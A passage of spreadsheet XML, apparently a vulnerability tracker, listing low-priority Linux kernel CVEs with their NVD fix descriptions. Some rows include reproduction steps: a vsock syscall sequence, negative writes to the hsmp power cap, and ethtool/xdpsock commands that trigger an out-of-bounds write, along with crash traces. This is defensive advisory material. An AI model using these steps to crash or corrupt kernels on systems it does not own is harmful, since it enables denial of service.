      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr"/>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix kmap_local_page() usage in compress
Several compressed I/O paths discard the address returned by
kmap_local_page() and later access or unmap the page using page_address().
This is invalid for highmem pages, and local mappings must also be unmapped
using the address returned by kmap_local_page().
Map each destination page in ntfs_decompress() only while producing the
current sub-block. Use memcpy_from_page(), memcpy_to_page(), and
memzero_page() for the other page accesses. Remove unnecessary local
mappings from ntfs_write_cb(), where pages are accessed through the vmap()
mapping.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90134</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90135</t>
        </is>
      </c>
      <c r="D503" s="5" t="inlineStr"/>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="inlineStr"/>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr"/>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: add missing ref_tracker_dir_exit() to alloc_netdev_mqs()
sashiko is reporting that trying to read /sys/kernel/debug/ref_tracker/*
causes use-afer-free crash when either alloc_percpu() or dev_addr_init()
in alloc_netdev_mqs() failed, for commit 4d92b95ff2f9 ("net: add net device
refcount tracker infrastructure") added ref_tracker_dir_exit() to only
free_netdev() path.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90135</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90136</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2026-09-17</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr"/>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/hsmp: Reject negative power cap writes in hwmon
hsmp_hwmon_write() takes the user-supplied hwmon value as a signed long
and assigns "val / MICROWATT_PER_MILLIWATT" to msg.args[0], which is a
__u32.  MICROWATT_PER_MILLIWATT is an unsigned long, so a negative write
to power1_cap (e.g. "echo -1 &gt; power1_cap") is first converted to a huge
unsigned value by the division and then stored into the u32 argument.
As a result a nonsensical, multi-gigawatt socket power limit is sent to
the SMU via HSMP_SET_SOCKET_POWER_LIMIT instead of the write being
rejected.
Reject negative values with -EINVAL before the conversion.
Tested with HSMP enabled:
  CAP=$(dirname $(grep -l amd_hsmp_hwmon \
        /sys/class/hwmon/hwmon*/name | head -1))/power1_cap
  # negative write
  echo -1000000 &gt; $CAP ; echo "ret=$?"
  # valid positive write must still work
  echo 400000000 &gt; $CAP ; echo "ret=$?"
Before:
  # echo -1000000 &gt; $CAP ; echo "ret=$?"
  ret=0                             &lt;- accepted; bogus limit sent to SMU
  # echo 400000000 &gt; $CAP ; echo "ret=$?"
  ret=0
After:
  # echo -1000000 &gt; $CAP ; echo "ret=$?"
  bash: echo: write error: Invalid argument
  ret=1                             &lt;- rejected with -EINVAL
  # echo 400000000 &gt; $CAP ; echo "ret=$?"
  ret=0                             &lt;- valid write still works</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90136</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90137</t>
        </is>
      </c>
      <c r="D505" s="5" t="inlineStr"/>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr"/>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix password encoding bounds check
The password PSWD_ENCODINGS parser reads password_obj[elem + pos_values]
while copying the supported password encodings from the ACPI package.
The outer loop only guarantees that elem is within password_obj_count.
The encoding count is bounded by MAX_ENCODINGS_SIZE, but that does not
guarantee that the ACPI package contains enough entries for all
elem + pos_values accesses.
A malformed package can therefore declare a non-zero encoding count
without providing enough string objects, causing the parser to read past
the ACPI package array and pass an out-of-bounds string pointer and
length to hp_convert_hexstr_to_str().
Add the same computed-index bounds check used by the other offset-based
package parsing loops before reading password_obj[elem + pos_values].</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90137</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90138</t>
        </is>
      </c>
      <c r="D506" s="5" t="inlineStr"/>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr"/>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vsock: don't check the listener's sk_err in vsock_accept()
Syzbot reported an issue which can be reproduced with these steps:
	r0 = socket(AF_VSOCK, SOCK_STREAM, 0)
	bind(r0, {VMADDR_CID_ANY, PORT})
	connect(r0, {VMADDR_CID_LOCAL, PORT}) -&gt; -1, EPROTO (self-connect)
	listen(r0, backlog)                   -&gt; 0
	r1 = socket(AF_VSOCK, SOCK_STREAM, 0)
	connect(r1, {VMADDR_CID_LOCAL, PORT}) -&gt; 0
	accept(r0)                            -&gt; -1, EPROTO (stale sk_err)
Basically, it creates a socket (r0) and triggers a self-connect after
binding it. This self-connect fails with EPROTO because it loops back
to r0 while the socket is still in the TCP_SYN_SENT state, causing it
to be incorrectly dispatched to the connecting-client path. The
unexpected packet type encountered there sets sk_err to EPROTO.
After that, it invokes a listen() call on the same socket. This
listen() call succeeds because the kernel's listening path never
inspects or clears sk_err. Then, a new socket (r1) is created as a
normal client and connects to r0. However, vsock_accept() rejects this
incoming connection because the listener's sk_err still holds the
EPROTO error from the earlier failed self-connect.
This rejection causes the child socket created for r1's connection to
never be freed on virtio or hyperv transports; only the VMCI transport
implements pending_work to revisit and clean up a rejected socket.
For a non-blocking connect(), vsock_connect() may return -EINPROGRESS
immediately, and vsock_connect_timeout() can later set sk-&gt;sk_err
asynchronously.
Since no vsock transport ever sets sk_err on a socket while it is in
TCP_LISTEN state, checking it in vsock_accept() serves no purpose and
only carries forward errors left behind by earlier, unrelated
connection attempts on the same socket. Remove the checks so accept()
no longer rejects valid incoming connections because of a stale
error, which also avoids the resource leak described above.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90138</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90139</t>
        </is>
      </c>
      <c r="D507" s="5" t="inlineStr"/>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="inlineStr"/>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr"/>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: check for NULL root inode in fuse_fill_super_submount
fuse_iget() can return NULL when its inode allocation fails, but
fuse_fill_super_submount() passed the result straight to get_fuse_inode()
and decremented fi-&gt;nlookup without checking it:
        root = fuse_iget(sb, parent_fi-&gt;nodeid, ...);
        fi = get_fuse_inode(root);
        fi-&gt;nlookup--;
Inside fuse_iget() the inode allocation can fail and return NULL.  The
submount root takes the iget5_locked() path, whose alloc_inode() can fail
under memory pressure (the auto-submount branch can fail the same way in
new_inode() or fuse_alloc_submount_lookup()):
        inode = iget5_locked(sb, nodeid, fuse_inode_eq, fuse_inode_set,
                             &amp;nodeid);
        if (!inode)
                return NULL;
A NULL root makes get_fuse_inode() a container_of() on NULL and the
nlookup decrement a write to a bogus address, oopsing the mount.  With
CONFIG_KASAN the following null pointer dereference is reported when the
root inode allocation of an auto-submount fails (e.g. under memory
pressure):
==================================================================
BUG: KASAN: null-ptr-deref in fuse_get_tree_submount+0x656/0x8b0
Read of size 8 at addr 00000000000002b0 by task ls/942
CPU: 0 PID: 942 Comm: ls Tainted: G W 6.6 #15
Call Trace:
 &lt;TASK&gt;
 fuse_get_tree_submount+0x656/0x8b0
 vfs_get_tree+0x48/0x140
 fc_mount+0x13/0x50
 fuse_dentry_automount+0x7a/0xb0
 __traverse_mounts+0xca/0x330
 step_into+0x339/0xac0
 path_lookupat+0xc5/0x2f0
 filename_lookup+0x163/0x2a0
 vfs_statx+0xd5/0x200
 do_statx+0x83/0xd0
 __x64_sys_statx+0xa0/0xc0
 do_syscall_64+0x37/0x90
 entry_SYSCALL_64_after_hwframe+0x78/0xe2
 &lt;/TASK&gt;
==================================================================
Return -ENOMEM instead; the caller tears down the partially built
superblock on error, matching the other error returns in this
function.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90139</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90140</t>
        </is>
      </c>
      <c r="D508" s="5" t="inlineStr"/>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="inlineStr"/>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr"/>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cuse: wait for pending RCU callbacks on module exit
Since commit 053fc4f755ad ("fuse: fix UAF in rcu pathwalks"),
fuse_conn_put() frees the fuse_conn through call_rcu() rather than
synchronously.  For cuse, fc-&gt;release is cuse_fc_release(), which
lives in the cuse module.  If the module is removed before the RCU
grace period ends, the callback jumps into freed module memory:
      userspace / module unload      |        RCU softirq
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 close(/dev/cuse)                    |
  cuse_channel_release()             |
   fuse_dev_release()                |
    fuse_conn_put(fch-&gt;conn)         |
     call_rcu(delayed_release) ------+---&gt; callback queued
                                     |
 rmmod cuse                          |
  cuse_exit()                        |
   cuse_channel_destroy()            |
   ...                               |
   return                            |
                                     |
 &lt;module text freed&gt;                 |
                                     |  rcu_do_batch()
                                     |   delayed_release()
                                     |    fc-&gt;release()
                                     |     -&gt; cuse_fc_release()
                                     |        ^^^ freed text!
The freed module text is unmapped by vfree(), so the jump into the
stale callback triggers a page-fault Oops.  If the virtual address
is subsequently reused, the callback could execute unrelated code
(undefined behaviour).
Fix this by calling rcu_barrier() in cuse_exit() so that any pending
fuse_conn release callback completes before the module is removed.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90140</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90141</t>
        </is>
      </c>
      <c r="D509" s="5" t="inlineStr"/>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="inlineStr"/>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr"/>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix integer overflow in ftp helper port/address parsing
ip_vs_ftp_get_addrport() accumulates decimal digits into a __u16
(hport) and into unsigned char (p[]) without checking for overflow.
A crafted FTP PASV/EPSV response with an over-long port or address
octet wraps the value, so the helper configures the data connection
with a truncated port/address.
The netfilter conntrack FTP helper had the same defect, fixed in
commit 2b413fc689ba ("netfilter: nf_conntrack_ftp: avoid u16
overflows"). Apply the equivalent fix here: widen the port accumulator
to u32 and reject values above 65535, and reject address octets above
255.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90141</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90142</t>
        </is>
      </c>
      <c r="D510" s="5" t="inlineStr"/>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="inlineStr"/>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr"/>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_net: Fix resize of the RX ring
When a AF_XDP socket is attached, the virtnet_rx_resize
should resize the rq-&gt;xsk_buffs XSK buffer array. Otherwise,
when the size grows, the virtnet_rx_resume() causes a write
past the end of the array. This is easily reproducable with
    ethtool -G ens3 rx 32
    ./xdpsock -i eth0 -q 0 -r -z &amp;
    ethtool -G eth0 rx 256</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90142</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90143</t>
        </is>
      </c>
      <c r="D511" s="5" t="inlineStr"/>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="inlineStr"/>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr"/>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: kcm: Hold RCU read lock while running BPF parser
kcm_parse_func_strparser() calls bpf_prog_run_pin_on_cpu() which
prevents CPU migration, but does not establish an RCU read-side
critical section. Consequently, BPF map operations can trigger
WARN_ON_ONCE(!bpf_rcu_lock_held()) when called from the KCM strparser
program.
Hold the RCU read lock while running the program.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90143</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90144</t>
        </is>
      </c>
      <c r="D512" s="5" t="inlineStr"/>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="inlineStr"/>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr"/>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dpll: fix NULL deref in dpll_device_ops() during teardown race
When the last owner of a dpll device unregisters while a foreign driver
still holds a pin on it via dpll_pin_on_pin_register(), the dpll object
stays alive with an empty registration list. A pin notification queued
before the unregister (e.g. ice reacting to zl3073x_i2c removal) then
walks pin-&gt;dpll_refs into dpll_device_ops(), which trips the WARN_ON and
dereferences the missing registration. dpll_lock cannot help because the
notification work was queued before the unregistering driver took the
lock.
Treat the empty registration list as a legitimate transient state. Make
dpll_priv() and dpll_device_ops() return NULL in that case and make
every pin netlink path that resolves a device from a pin skip such
dplls. dpll_cmd_pin_get_one() picks a ref with a live registration and
returns -ENODEV when there is none, the pin dumpit skips such a pin
instead of aborting the dump, dpll_msg_add_pin_dplls() and the
frequency, esync, reference sync and phase adjust set paths skip dead
refs, and dpll_pin_parent_device_set() validates the parent with
dpll_device_get_by_id(). dpll_pin_register() is the last caller that
dereferenced the device ops without a check, so move its frequency
monitor validation under dpll_lock and tolerate a missing registration
there as well.
The empty registration list is equivalent to a cleared DPLL_REGISTERED
mark, both transitions happen under dpll_lock in dpll_device_register()
and dpll_device_unregister(). A pin notification for a pin whose dplls
are all gone is now dropped with -ENODEV instead of crashing, all
callers in the core ignore that return value.
 WARNING: drivers/dpll/dpll_core.c:1092 at dpll_device_ops+0x24/0x40,
 CPU#83: kworker/u576:3/23471
 Modules linked in: ... ice ... zl3073x_i2c(-) ... zl3073x ...
 Workqueue: ice_dpll_wq ice_dpll_pin_notify_work [ice]
 RIP: 0010:dpll_device_ops+0x24/0x40
 Call Trace:
  &lt;TASK&gt;
  dpll_cmd_pin_get_one+0x336/0x520
  dpll_pin_event_send+0x82/0x140
  dpll_pin_on_pin_unregister+0xbb/0x160
  ice_dpll_pin_notify_work+0x1bc/0x1f0 [ice]
  process_one_work+0x19e/0x370
  worker_thread+0x1a6/0x310
  kthread+0xe4/0x120
  ret_from_fork+0x1a1/0x270
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
 ---[ end trace 0000000000000000 ]---
 BUG: kernel NULL pointer dereference, address: 0000000000000010
 #PF: supervisor read access in kernel mode
 #PF: error_code(0x0000) - not-present page</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90144</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90145</t>
        </is>
      </c>
      <c r="D513" s="5" t="inlineStr"/>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="inlineStr"/>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr"/>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hinic3: Fix skb linearization mismatch and drop skb when skb_checksum_help() failed
Previously, hinic3_send_one_skb() cached the skb fragment count before
calling hinic3_tx_offload(). If hinic3_tx_csum() falls back to
skb_checksum_help() for unsupported tunnel packets, the skb may be
linearized. Continuing to build the TX descriptor with the stale
fragment count leads to a descriptor mismatch, which can trigger
out-of-bounds DMA reads or IOMMU faults.
Furthermore, the old code ignored the return value of skb_checksum_help(),
transmitting corrupted packets with incomplete checksums upon failure.
Fix this by:
1. Moving the hinic3_tx_offload() call before calculating 'num_sge' to
   ensure the correct fragment count is used if the SKB is linearized.
2. Propagating skb_checksum_help() errors and returning
   HINIC3_TX_OFFLOAD_INVALID to properly drop the skb.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90145</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90146</t>
        </is>
      </c>
      <c r="D514" s="5" t="inlineStr"/>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="inlineStr"/>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr"/>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, xdp: move offload check into dev_xdp_install()
bpf_xdp_link_update() calls dev_xdp_install() directly and skips
dev_xdp_attach(), so the checks in dev_xdp_attach() do not run. A user can
make an XDP link with a normal program and then swap in an offloaded or
device-bound program with BPF_LINK_UPDATE, which puts it on the software
path.
dev_xdp_install() is the one place all three paths go through:
"ip link set xdp" and BPF_LINK_CREATE reach it via dev_xdp_attach(), and
BPF_LINK_UPDATE calls it directly. So move the program checks (offloaded,
bound to another device, device-bound in generic mode, native vs generic,
DEVMAP and CPUMAP) there, and keep only the netlink-flag check
(XDP_FLAGS_UPDATE_IF_NOEXIST) in dev_xdp_attach().</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90146</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90147</t>
        </is>
      </c>
